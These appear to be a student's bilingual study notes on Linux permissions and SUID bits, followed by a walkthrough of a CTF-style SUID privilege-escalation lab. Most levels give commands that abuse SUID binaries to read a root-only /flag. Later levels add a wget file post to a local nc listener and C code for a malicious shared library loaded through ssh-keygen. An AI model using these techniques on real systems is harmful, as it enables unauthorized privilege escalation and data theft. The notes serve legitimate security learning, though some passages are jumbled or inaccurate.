Linux Command Line
ls -ld /some-path
# - regular file
# d: directory, l symbolic link,
#p: named pipe: FIFO
# c: character device file hardware that provide data stream: e.g.:
# b: block device file hardware that stores and loads blocks of data, e.g.: a hard drive
# s: unix socket
Note: Symbolic links(soft links) to relative paths are relative to the directory containing the link(ln -s
hard link: inode, valid ref to the original files(ln without -s)
pipes:
unnamed pipes: e.g.: cat a|md5sum
named pipes: FIFOs, created using mkfifo
Privilege Escalation
Every process has a userID and a GID
every file and directory is owned by a user and a group
child processes inherit ownership from parent
UID 0 is root
Run an suid binary can elevate the privilege
If an SUID binary has a security problem, an attacker can use it in a privilege escalation attack
SUID: execute with the eUID of the file owner rather than the parent process
SGID: with eGID(original GID, GID owner)
Sticky: for shared directories to limit file removal to file owners
Keywords:
Effective (eUID, eGID) the UID/GID used for most access checks
Real UID/GID: used for things such as signal checks
Saved: a UID/GID that your process could switch its eUID/eGID to, to temporarily dropping privileges
Typical flow:
-
Gain a foothold on the system(vulnerable network service, intended shell access, code in app context, etc)
-
Identify a vulnerable privileged service
-
Exploit the privileged service to gain its privileges
Unnecessary sudo is common in shared server management software, containerization.
OS-level vulnerabilities
Mitigations
Mitigation reduce but do not eliminate the potential for harm
If /bin/sh is run as SUID(e.g.: eUID == 0 but rUID != 0), it will drop privileges to the rUID.
To disable that use sh -p
Note: 是bash -p才提权,bash本身默认限制
e.g.: Wireshark需要root权限来嗅探network traffic,但是自身又有非常多的protocol parser,为此提供了很大的attack surface。
Mitigation:将嗅探部分独立出来为dumpcap
通用方法: sandboxing
sid
chmod WhoWhatWhich file | directory
Where:
Who - represents identities: u,g,o,a (user, group, other, all)
What - represents actions: +, -, = (add, remove, set exact)
Which - represents access levels: r, w, x (read, write, execute)
e.g.:
chmod 650 test.txt
X是execute,而s则是special
SUID允许任何用于以文件拥有者的权限运行
A file with SUID always executes as the user who owns the file, regardless of the user passing the command.
SGID: 对文件,允许以拥有该文件的group为资格来运行。对directory,任何该文件夹下创先的文件将自动以directory group owner为owner
sticky bit: 以t表示,不会影响文件的执行操作,但是只有owner of a file和root能够删除该文件。
[tcarrigan@server article_submissions]$ ls -ld /tmp/ drwxrwxrwt. 15 root root 4096 Sep 22 15:28 /tmp/
似乎是有这个d就代表special bit(X)至少不全为0
设置方法:
chmod g+s community_content/
数字方法:以X开头
Start at 0
SUID = 4
SGID = 2
Sticky = 1
chmod X### file | directory
e.g.:
[tcarrigan@server article_submissions]$ chmod 2770 community_content/
[tcarrigan@server article_submissions]$ ls -ld community_content/
drwxrws---. 2 tcarrigan tcarrigan 113 Apr 7 11:32 community_content/
Practices:
- Level1-6: 运行之后就能读取flag,Q: how? Flag仍然是只有root可读的状态??
- 是修改了sUID bit of /usr/bin/cat,more,less, tail, head, sort
sort是在Linux里非常常用的一个命令,管排序的,集中精力,五分钟搞定sort,现在开始! sort将文件的每一行作为一个单位,相互比较,比较原则是从首字符向后,依次按ASCII码值进行比较,最后将他们按升序输出。 它的作用很简单,就是在输出行中去除重复行。
-
Level7-9:聚焦在被SUID的编辑器上。vim, emacs, nano
-
Level10-16: 提rev,rev能把文件内容倒过来
- Level11: od, Write an unambiguous representation, octal bytes by default, of FILE to standard output.
od -c /flag | sed 's/[[:space:]]//g' | sed 's/^.\{7\}//g' | tr '\n' ' ' | sed 's/[[:space:]]//g'od -c /flag | sed 's/[[:space:]]//g' | sed 's/^.\{7\}//g'
-
Level12:hd
-
level13: xxd
-
level14:base32,base64
-
level16: split
- Level17-23: archive formats
-
gzip, bzip2, tar, zip, ar,cpio,genisoimage
-
注意有些压缩文件解压缩之后权限仍然不改,此时用-c,-O, p之类的打印到stdout上
-
cpio的输入是一个有文件名称列表的文件,而不是列表本身。cpio会尝试把文件放回绝对路径。cpio可以更改文件usr ownership
-
echo "/flag" > 1.txt cpio -R hacker -p tmpdir < 1.txt -
学习
tar -Oxf /flag.tar ar rc /flag.a /flag echo "/flag" | cpio –o -
genisoimage直接添加file会把超过权限的都去掉,但是将文件作为规则读取时就没有做好防护
genisoimage --sort /flag
- Level24-32: execute other commands
env DEBUG=1 cat /flag
find / -name *lag -exec cat {} \;
printf "a:\ncat \\\flag" > tmp.makefile
make -f tmp.makefile a
nice -n 1 cat /flag
timeout 1 cat /flag
stdbuf -o L cat /flag
setarch --addr-no-randomize cat /flag
watch -x -b cat /flag
socat -u file:/flag file:1.txt
-
make中一开始用--eval还以为不行。应该是在传入make之前就被预处理了
-
socat establishes two bidirectional byte streams and transfers data between them.
- Level33-36
whiptail --textbox /flag 10 100
awk '{print}' /flag
sed "/[[:space:]]/d" /flag
ed -G /flag #press p
-
whiptail --yesno "hello" 10 10whiptail就是terminal中出现的可以点击的信息框 -
ed是一个editor
- Level37-41
chown hacker /flag
chmod 777 /flag
cp /flag 1.txt
/challenge/babysuid_level40 && mv /usr/bin/cat /usr/bin/mv && mv /flag
- Level40居然是要多次使用babysuid为/usr/bin/mv对应的不管什么binary提权
- Level41-44: perl, python, ruby, bash
注意bash -p才是提权,bash本身不是
- Level45-49: date, dmesg(Display or control the kernel ring buffer.), wc,gcc, as
gcc -S -x c /flag
-
Level50 用了
wget -i /flag得到decoy flag, 但是也可以用wget --header="Content-type: multipart/form-data boundary=FILEUPLOAD" --post-file flag http://127.0.0.1:4554/另起一个终端nc -lvnp 4554不知为何如果是两个指令在一个终端,nc background就没有输出,可能是打错了 不能用-i的原因是其中有大写字母也有小写字母,而wget会把大写字母都化为小写字母 -
Level51:ssh-keygen的FIDO库
#include <stdio.h>
int sk_api_version(void) {
FILE * fp, *fp2;
char buffer[1024];
fp = fopen("/flag", "r");
fp2 = fopen("flag.bk", "w");
fread(buffer, 1024, 1, fp);
fwrite(buffer, 1024, 1, fp2);
fclose(fp);
fclose(fp2);
printf("Constructor function executed.\n");
return 0;
}
Bash
gcc liba.c -shared -o liba.so
ssh-keygen -vvvv -t ecdsa-sk -w ./liba.so
查询博客后得到另一种用ssh-keygen -D的方法。博客上还写了不可以使用system来执行euid提权操作
#include <stdio.h>
#include <stdlib.h>
char C_GetFunctionList[2014]="C_GetFunctionList";
__attribute__((constructor)) void sth(){
sendfile(1, open("/flag",0), 0, 4096);
}
ssh-keygen -D /home/hacker/libb.so